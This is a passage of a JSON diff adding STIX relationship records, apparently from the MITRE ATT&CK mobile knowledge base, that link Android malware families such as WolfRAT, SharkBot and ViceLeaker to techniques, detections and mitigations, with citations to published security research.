"https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/", + "description": "R. Unuchek. (2017, June 8). Dvmap: the first Android malware with code injection. Retrieved December 10, 2019." 
+ } + ], + "modified": "2019-12-10T16:07:41.066Z", + "description": "[Dvmap](https://attack.mitre.org/software/S0420) decrypts executables from archive files stored in the `assets` directory of the installation binary.(Citation: SecureList DVMap June 2017)", + "relationship_type": "uses", + "source_ref": "malware--22b596a6-d288-4409-8520-5f2846f85514", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7de1af68-d893-40a0-b27a-c9010f5cdc62", + "created": "2023-03-20T18:57:14.194Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:57:14.194Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--5ca3c7ec-55b2-4587-9376-cf6c96f8047a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--bfd0d9cb-27e2-42a2-9207-764bb1491962", + "created": "2022-03-30T19:54:07.548Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Device attestation could detect devices with unauthorized or unsafe modifications. 
", + "modified": "2022-03-30T19:54:07.548Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--66ba3094-7c14-41b9-b7c1-814d026156b9", + "type": "relationship", + "created": "2020-09-11T15:58:40.846Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020." + } + ], + "modified": "2020-09-11T15:58:40.846Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) can delete and send SMS messages.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f1130c77-3d20-4c41-9e75-1953bf9b8abc", + "created": "2020-09-14T14:13:45.286Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout eSurv", + "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. 
Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/esurv-research" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:40:48.237Z", + "description": "[eSurv](https://attack.mitre.org/software/S0507) has exfiltrated data using HTTP PUT requests.(Citation: Lookout eSurv)", + "relationship_type": "uses", + "source_ref": "malware--680f680c-eef9-4f8a-b5f5-f451bf47e403", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--79c3fe5d-585b-401a-8bb4-84bfdc7252a1", + "created": "2022-04-06T13:52:46.831Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 7 changed how the Device Administrator password APIs function.", + "modified": "2022-04-06T13:52:46.831Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--eb6cf439-1bcb-4d10-bc68-1eed844ed7b3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e5ccc5c7-11ee-4357-8dd4-bf23ce2111bb", + "created": "2020-12-24T22:04:28.024Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). 
Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:41:54.548Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has collected call logs.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b3866c07-e143-4d0d-9176-c2845f85c5ab", + "created": "2023-01-18T19:58:21.223Z", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. 
Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-01-18T19:58:21.223Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) has used RSA to encrypt the symmetric encryption key used for C2 messages.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--16d73b64-5681-4ea0-9af4-4ad86f7c96e8", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d0c039cb-c815-4d9c-a100-a45f923bc65b", + "type": "relationship", + "created": "2020-12-24T21:45:56.981Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2020-12-24T21:45:56.981Z", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) has access to the device’s location.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--10560632-6449-4579-90eb-20fc46dcca08", + "created": "2020-10-29T19:21:23.200Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "WeLiveSecurity AdDisplayAshas", + "description": "L. Stefanko. (2019, October 24). Tracking down the developer of Android adware affecting millions of users. Retrieved October 29, 2020.", + "url": "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:49:16.886Z", + "description": "[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) can check that the device IP is not in the range of known Google IP addresses before triggering the payload and can delay payload deployment to avoid detection during testing and avoid association with unwanted ads.(Citation: WeLiveSecurity AdDisplayAshas)", + "relationship_type": "uses", + "source_ref": "malware--f7e7b736-2cff-4c2a-9232-352cd383463a", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": 
"relationship--373f33be-9b40-44f5-bfd3-db2a9f5fa72c", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "HackerNews-OldBoot", + "description": "Sudhir K Bansal. (2014, January 28). First widely distributed Android bootkit Malware infects more than 350,000 Devices. Retrieved December 21, 2016.", + "url": "http://thehackernews.com/2014/01/first-widely-distributed-android.html" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[OldBoot](https://attack.mitre.org/software/S0285) uses escalated privileges to modify the init script on the device's boot partition to maintain persistence.(Citation: HackerNews-OldBoot)", + "relationship_type": "uses", + "source_ref": "malware--2074b2ad-612e-4758-adce-7901c1b49bbc", + "target_ref": "attack-pattern--46d818a5-67fa-4585-a7fc-ecf15376c8d5", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a1c53fcf-a691-4233-a136-0a51d5a3840f", + "created": "2019-09-03T19:45:48.518Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. 
Retrieved September 3, 2019.", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:11:03.802Z", + "description": "[Exodus](https://attack.mitre.org/software/S0405) Two can capture SMS messages.(Citation: SWB Exodus March 2019)", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--38cb6365-40ba-47c6-a5e4-1a9be665f951", + "created": "2023-01-19T18:08:14.716Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "trendmicro_tianyspy_0122", + "description": "Trend Micro. (2022, January 25). TianySpy Malware Uses Smishing Disguised as Message From Telco. 
Retrieved January 11, 2023.", + "url": "https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-01T16:50:04.964Z", + "description": "[TianySpy](https://attack.mitre.org/software/S1056) has encrypted C2 details, email addresses, and passwords.(Citation: trendmicro_tianyspy_0122) ", + "relationship_type": "uses", + "source_ref": "malware--fd6d56b2-d84e-4d2a-b37d-d4678d3e08a6", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c021d9b9-3850-425d-b3d2-6b7bd7e62b95", + "type": "relationship", + "created": "2019-10-18T15:51:48.525Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2019-10-18T15:51:48.525Z", + "description": "Users should be advised not to use public charging stations or computers to charge their devices. Instead, users should be issued a charger acquired from a trustworthy source. 
Users should be advised not to click on device prompts to trust attached computers unless absolutely necessary.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6920d0d0-27f4-4d29-8622-c8a92090eec3", + "created": "2020-07-20T13:27:33.486Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020.", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:54:25.851Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) can collect the device’s contact list.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--bbe1af69-7303-4205-82d8-5b03c43e39c1", + "type": "relationship", + "created": "2020-11-24T17:55:12.887Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos GPlayed", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", + "description": "V. Ventura. 
(2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020." + } + ], + "modified": "2020-11-24T17:55:12.887Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) can collect the device’s model, country, and Android version.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3f5dbd48-5899-4e97-96a6-ad7e68b673cd", + "created": "2023-03-20T18:43:03.117Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:43:03.117Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e928c0ce-2b98-4af5-a990-f690f4306681", + "created": "2023-03-20T18:43:46.070Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:43:46.070Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--d446b9f0-06a9-4a8d-97ee-298cfee84f14", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6cace9e3-f095-4914-bddc-24cec8bcc859", + "type": "relationship", + "created": "2020-09-24T15:34:51.276Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-Dendroid", + "description": "Marc Rogers. (2014, March 6). Dendroid malware can take over your camera, record audio, and sneak into Google Play. Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/03/06/dendroid/" + } + ], + "modified": "2020-09-24T15:34:51.276Z", + "description": "[Dendroid](https://attack.mitre.org/software/S0301) can collect the device’s photos, browser history, bookmarks, and accounts stored on the device.(Citation: Lookout-Dendroid)", + "relationship_type": "uses", + "source_ref": "malware--317a2c10-d489-431e-b6b2-f0251fddc88e", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--54ce9375-cc0f-456e-ac22-e6fe822a6cec", + "created": "2022-04-01T15:54:48.924Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Applications very rarely require administrator permission. Developers should be cautioned against using this higher degree of access to avoid being flagged as a potentially malicious application. 
", + "modified": "2022-04-01T15:54:48.924Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1", + "target_ref": "attack-pattern--08ea902d-ecb5-47ed-a453-2798057bb2d3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--2be3d0a4-2e24-4d04-859e-37d24835ff16", + "type": "relationship", + "created": "2021-02-17T20:43:52.420Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout FrozenCell", + "url": "https://blog.lookout.com/frozencell-mobile-threat", + "description": "Michael Flossman. (2017, October 5). FrozenCell: Multi-platform surveillance campaign against Palestinians. Retrieved November 11, 2020." + } + ], + "modified": "2021-02-17T20:43:52.420Z", + "description": "[FrozenCell](https://attack.mitre.org/software/S0577) has retrieved device images for exfiltration.(Citation: Lookout FrozenCell)", + "relationship_type": "uses", + "source_ref": "malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c659256c-82e3-4f4c-ac70-3d2400cf6695", + "type": "relationship", + "created": "2020-09-11T16:23:16.363Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). 
Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T16:23:16.363Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can send SMS messages.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--8650e2e8-d8bd-472d-8b9b-54befbea05b8", + "created": "2022-04-05T19:49:59.027Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T19:49:59.027Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--0f4fb01b-d57a-4375-b7a2-342c9d3248f7", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--634071ce-d386-4143-8e6e-b88bc077de6d", + "type": "relationship", + "created": "2020-07-27T14:14:56.961Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Security Zen", + "url": "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html", + "description": "Siewierski, L. (2019, January 11). PHA Family Highlights: Zen and its cousins . Retrieved July 27, 2020." 
+ } + ], + "modified": "2020-08-10T22:18:20.782Z", + "description": "[Zen](https://attack.mitre.org/software/S0494) can dynamically load executable code from remote sources.(Citation: Google Security Zen)", + "relationship_type": "uses", + "source_ref": "malware--22faaa56-a8ac-4292-9be6-b571b255ee40", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c368c932-7d5a-40e3-a18b-f30e82b9e4e6", + "type": "relationship", + "created": "2020-10-29T17:48:27.332Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020." 
+ } + ], + "modified": "2020-10-29T17:48:27.332Z", + "description": "[Exobot](https://attack.mitre.org/software/S0522) can obtain the device’s IMEI, phone number, and IP address.(Citation: Threat Fabric Exobot) ", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a427ce33-d1e1-4c38-a024-e44fc00033d3", + "created": "2020-12-14T14:52:03.283Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Sophos Red Alert 2.0", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. Retrieved December 14, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) has communicated with the C2 using HTTP requests over port 7878.(Citation: Sophos Red Alert 2.0)", + "modified": "2022-04-20T16:43:23.973Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "target_ref": "attack-pattern--948a447c-d783-4ba0-8516-a64140fcacd5", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f632b0bb-69ce-4678-bc3c-9ddff5a38794", + "type": "relationship", + "created": "2019-11-21T16:42:48.488Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019.", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/", + "source_name": "SecureList - ViceLeaker 2019" + }, + { + "source_name": "Bitdefender - Triout 2018", + "url": "https://labs.bitdefender.com/2018/08/triout-spyware-framework-for-android-with-extensive-surveillance-capabilities/", + "description": "L. Arsene, C. Ochinca. (2018, August 20). Triout – Spyware Framework for Android with Extensive Surveillance Capabilities. Retrieved January 21, 2020." 
+ } + ], + "modified": "2020-01-21T14:20:50.474Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) can record audio from the device’s microphone and can record phone calls together with the caller ID.(Citation: SecureList - ViceLeaker 2019)(Citation: Bitdefender - Triout 2018)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d87b468e-f610-4e95-8dfb-8cf029f0e891", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ArsTechnica-HummingBad", + "description": "Dan Goodin. (2016, July 7). 10 million Android phones infected by all-powerful auto-rooting apps. 
Retrieved January 24, 2017.", + "url": "http://arstechnica.com/security/2016/07/virulent-auto-rooting-malware-takes-control-of-10-million-android-devices/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[HummingBad](https://attack.mitre.org/software/S0322) can exploit unfixed vulnerabilities in older Android versions to root victim phones.(Citation: ArsTechnica-HummingBad)", + "relationship_type": "uses", + "source_ref": "malware--c8770c81-c29f-40d2-a140-38544206b2b4", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7965128c-89d6-411e-b765-c60e0cae96c6", + "created": "2023-02-06T19:40:36.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A 